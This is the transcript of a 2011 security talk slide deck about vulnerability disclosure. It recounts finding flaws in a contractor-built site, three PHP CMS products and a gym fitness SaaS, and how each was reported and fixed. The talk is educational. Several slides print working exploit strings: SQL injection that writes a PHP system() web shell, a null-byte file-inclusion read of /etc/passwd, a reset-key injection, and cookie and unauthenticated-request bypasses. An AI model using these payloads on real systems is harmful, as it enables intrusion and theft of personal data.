It's Vulnerable, Now What?: Three Diverse Tales of Woe and Remediation

It's Vulnerable, Now What?: Three Diverse Tales of Woe and Remediation

Very few people in IT have the distinction of being considered a “security researcher” by title alone. Despite that designation, many of us run across security vulnerabilities every day and sometimes just go “ah, someone should report that!” rather than taking the initiative to wear the security researcher hat and handle it ourselves.

In this presentation I will cover three diverse situations of vulnerabilities that I ran across and how I went about getting them remediated. Situations include: a PII/PHI vulnerability in a SaaS application with 90,000 affected users; an open-source CMS SQL injection vulnerability (CVE-2010-4006); and a client’s web site that was riddled with vulnerability from a contractor’s poor programming practices.

If you’ve wondered what you as a system administrator, web developer, or general IT enthusiast should do in these kinds of situations, come hear real stories and learn from my actions and related mistakes! Learn about requesting a CVE, contacting vendors, 0-day vs. vendor-friendly disclosure, and more. The presentation will feature code snippets/exploitation of each vulnerability and include screenshots (where allowed) of the situations.

9eaada9384c46142a8fd246f11cb9bef?s=128

Mark Stanislav

February 11, 2011
Tweet

Transcript

  1. It's Vulnerable… Now What? Three Diverse Tales of Woe and

    Remediation Mark Stanislav <mark.stanislav@gmail.com>
  2. De-Facto Quote Slide Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit “Thank goodness

    the working exploit will remain as the ‘gold standard’ for cutting through the BS in the field of data security for the foreseeable future.” - Marsh Ray
  3. The More Hats The Better Day Job: Linux systems administrator

    Night Job: Adjunct lecturer at a university Boredom: Finding web app vulnerabilities Side Note: PHP programmer for ~10 years* * Quickly becoming a Ruby fiend
  4. PHP Vulnerability Primer Inputs That Get Owned: $_GET: Query Strings

    index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”> $_COOKIE: Cookies Chocolate Chip -- nom nom.
  5. PHP Vulnerability Primer, cont. Common Attacks: Local File Inclusion (LFI)

    Show me your /etc/passwd file SQL Injection Show me your user table Authentication/Authorization Bypass Who needs a username or password?
  6. Tale #1 - On The Clock Scenario: A client hires

    a PHP developer to create a web site for their financial service company (Forex) Problem: Developer has no business writing a ‘Hello, World!’ application, let alone a web application handling credit card data
  7. Vulnerabilities Found Adjust ‘membership level’ of any account Reset account

    passwords to hardcoded default Change any user password to a desired value Delete all user accounts Retrieve ACH account information Retrieve all user account details Create an administrative user account
  8. Clown Shoes “Something or someone that is a total joke”

    Source: Urban Dictionary; it’s legit
  9. Code Review, Part #1 function updateMembershipLevel() { list($level,$email) = GetVars('level','email');

    DB_query("UPDATE users SET membership_level = '$level' WHERE email = '$email'"); } Vulnerable Code foo.php?mod=user&req=updatelevel&level=100&email=user@example.com Exploit Why The Code Sucks •No authentication prior to allowing execution of updateMembershipLevel() •There is no audit trail to changes being made through this function •The code does not escape or sanitize $_GET variables being passed
  10. Code Review, Part #2 function updatePassword() { list($resetkey,$pass) = PostVars('resetkey','pass1');

    $html = ReadTemplate('password','password_email_form'); $sql = "UPDATE users SET passwd = md5('".DB_escape_string($pass)."') WHERE resetkey='$resetkey'"; DB_query($sql); [...]} Vulnerable Code <form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value="' OR resetkey IS NOT NULL OR resetkey='TRUE" /> <input type="text" name="pass1" value="test" /> </form> Exploit Why The Code Sucks •Only the password input is escaped properly, the ‘resetkey’ $_POST input is not •SQL doesn’t use parameterized statements to protect against general SQL injection •No audit trail for when passwords are being changed using this function
  11. Code Review, Part #3 function insertUser() { if ((is_SuperUser()) &&

    (isset($_SESSION['virtual_client_id'])) { $clientID = $_SESSION['virtual_client_id']; } else { $clientID = $_SESSION['client_id']; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars('first','last','email','group','passwd','addr1','addr2','city','state','zip'); [...]} Vulnerable Code foo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1 Exploit Why The Code Sucks •insertUser() method isn’t restricted from being available to unauthenticated site visitors •is_SuperUser() doesn’t affect arbitrary calls to add a user to the database •No sanitization or verification is done to any data based on $_GET variables passed •No audit trail for ‘who’ is adding a user; in this case, no one ;)
  12. Remediation Created an executive summary of the vulnerabilities, their associated

    impacts, and recommendations to resolve the issues. The developer was fired and a new one was hired who fixed the issues; which I verified. Fun Fact: The developer who wrote this code uses the same code-base for 30+ sites currently online using the same framework...
  13. What’s a CVE? Common Vulnerabilities & Exposures “A CVE Identifier

    will give you a standardized identifier for any given vulnerability or exposure.” - MITRE CVE FAQ Only for packaged software offerings Ideally used in a ‘responsible disclosure’ process Keeps issues organized and easy to reference Helps to prevent duplication of vulnerabilities
  14. How Do I Get a CVE? 1.Find the vulnerability --

    score! 2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late. 3.Contact a CVE Numbering Authority (CNA) 4.Ideally the vendor cares and fixes the issue 5.Release your advisory with the CVE included 6.Provide links of publication back to MITRE
  15. Tale #2 - The Community Scenario: Random PHP applications you

    find on SourceForge.net & FreshMeat.net Problem: Not everyone releasing free (as in GNU) or paid (as in $$$) are good programmers -- surprise!
  16. WSN Links SQL Injection Vulnerable Code search.php?namecondition=IS NULL)) UNION ((SELECT

    "<?php system($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/ exec.php&action=filter&filled=1&whichtype=categories Exploit Why The Code Sucks •Improper sanitization of $_GET inputs within some functions of search •No explicit installation recommendation to prevent FILE privilege •Side Note: foo.php?debug=1 turns on debugging in the default installation Didn’t copy it down, but basically: ‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injection when unified to bridge existing SQL queries to allow for exploitation
  17. WSN Links Remediation CVE-2010-4006 Vendor blacklisted ‘UNION’ within search queries

    as a ‘fix’ to the issue New version released 3 days after notification had occurred It would be better to actually fix all of the SQL injection bugs (yes, there are more) rather than using a bandage like a UNION blacklist
  18. Pointter CMS Authentication Bypass Vulnerable Code Simply create ‘auser’ and

    ‘apass’ cookies. The contents of the cookies don’t impact the exploitation as there is no verification of contents before ‘using’ the cookies as a valid authentication mechanism. Exploit Why The Code Sucks •There’s no reason to store a password cookie in the first place •A session cookie should be unique and encrypted •Blank cookies should never be used as a form of authentication On all administrative pages: if (!isset($_COOKIE['auser']) or !isset($_COOKIE['apass'])) { header("location:index.php"); }
  19. Pointter CMS Remediation CVE-2010-4332 & CVE-2010-4333 Two separate products, same

    vulnerability No updates have been released to fix the issue Disclosure to vendor was met with legal threats and very funny dialog (you’ll see...) Vendor claims that the user should rename their admin folder to hide, erm... prevent the issue! =)
  20. The Swiss “Not as docile as you’d expect...” Source: Me;

    it’s legit
  21. E-Mail Outtakes! “We do not understand why you try to

    manipulate the softwares. I am sure that you are aware that it is illegal to do so.” “...it is not your duty to publish anything related about our softwares as long as we ask for it.” “What you are trying to do, is to find a security hole and publish it so that everyone can hack a system. This is the illegal part so be aware of this.”
  22. E-Mail Outtakes!, cont. “The illegal thing is to publish a

    security gap to show other people the way how to attack. That is the same as telling someone how to build a bomb.” “Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work.”
  23. Null-Byte Attack Primer PHP uses C functions for filesystem calls

    which reads a null-byte as ‘end of string’ include(“/var/www/” . $_GET[‘file’] . “.php”); index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”); index.php?file=../../../etc/passwd%00 include(“/var/www/../../../etc/passwd”);
  24. Pulse CMS Local File Inclusion Vulnerable Code index.php?p=/../../../../../../../../../../../../../../etc/passwd%00 Exploit Why

    The Code Sucks •This method to prevent LFI is easily defeated with magic_quotes_gpc disabled •There’s no sanitization or regex used to prevent LFI attacks •Null-byte attacks are a problem with PHP (C-based) and need to be considered $page = $_REQUEST['p']; switch ($page) { case $page: include("includes/". $page .".php"); break; }
  25. Pulse CMS Remediation CVE-2010-4330 Vendor patched the current version immediately

    and then released a few version a few days later Null-byte attacks are a real problem and programmers need to program with it in mind File inclusion from a user-controlled variable should heavily interrogated (regex/sanitization)
  26. Tale #3 - SaaS Gone Wrong Scenario: You sign-up for

    a gym membership Problem: Your gym’s online fitness integration web site has broken Single Sign-On causing massive PII/PHI leakage
  27. SSO “Bypass” Vulnerable Code http://www.example.com/diff/partners/member_activate.aspx? memberid=[memberid_integer]&gymid=[gymid_integer] Exploit Why The Code

    Sucks •It didn’t require users to ‘sign-up’ for some of their data to be available •Complete SSO implementation failure •No one could have possibly tested/QA’ed this code before it was launched Have no access to company’s site code, but here’s my best guess... checkAuthentication($memberid, $gymid) { //Implement this later, kthx! }
  28. Vulnerability Verification Script #1: Out of 10,000 sequential 'memberid' values

    roughly 2,700 accounts existed in either an 'activated' or 'unactivated' state. Script #2: Of the 1,000 'memberid' values checked, 76 accounts were activated. One user profile had a picture, eight users had listed phone numbers, and at least one user had a medical questionnaire filled-out.
  29. Information Being Disclosed Unactivated Account: First Name, Last Name, Date

    of Birth, Gender, and E-Mail Address Activated Account: Photo, First Name, Last Name, Date of Birth, Gender, E-Mail Address, Phone Number, Height, Weight, Body Fat %, Timezone, Gym Membership Company, Workout Schedule, and Medical History (blood pressure issues, heart problems, recent surgery, pregnancy, diabetes, etc.)
  30. Remediation Contacted CEO (small company) with a report Lots of

    follow-up e-mails with increasing amounts of people (read: lawyers/execs) added Consistently reaffirmed my commitment to help and deflected any comments towards me being some kind of nefarious hacker Took three weeks after successful contact to have the issue actually fixed...
  31. Customers Notified 90,000+

  32. But be careful... It’s a very thin line between committing

    a crime and just trying to help a web site with a problem Don’t make threats, don’t ‘force their hand’; be respectful, professional, and continuously affirm your desire to protect people and information Anyone can be sued at anytime for anything in our country -- it doesn’t mean you’re guilty, but you can certainly lose time and money this way Let your ethics and common sense lead you...
  33. Generalized Take-Aways Do the right thing, consistently, and people won’t

    have much room to actually threaten you Full-disclosure to the community helps to keep developers and businesses accountable for the products and services they offer Responsible disclosure allows you to make more friends than enemies; most people are really appreciative of your assistance Vulnerability research is tediously fun! ;)
  34. My Thoughts... Info Sec. is everyone’s responsibility Don’t accept an

    answer of “well, we didn’t build this with security in mind...” Ethics and information security are not, in my mind, allowed to be separated This isn’t about 1337 ‘sploits. It’s about protecting your business, your friends, your family, and yourself from unethical people
  35. Thanks... Jon Oberheide - Duo Security Steve Christy - MITRE

    Todd Jarvis - Packet Storm Security
  36. Contact E-Mail: mark.stanislav@gmail.com Twitter: @markstanislav Website: http://www.uncompiled.com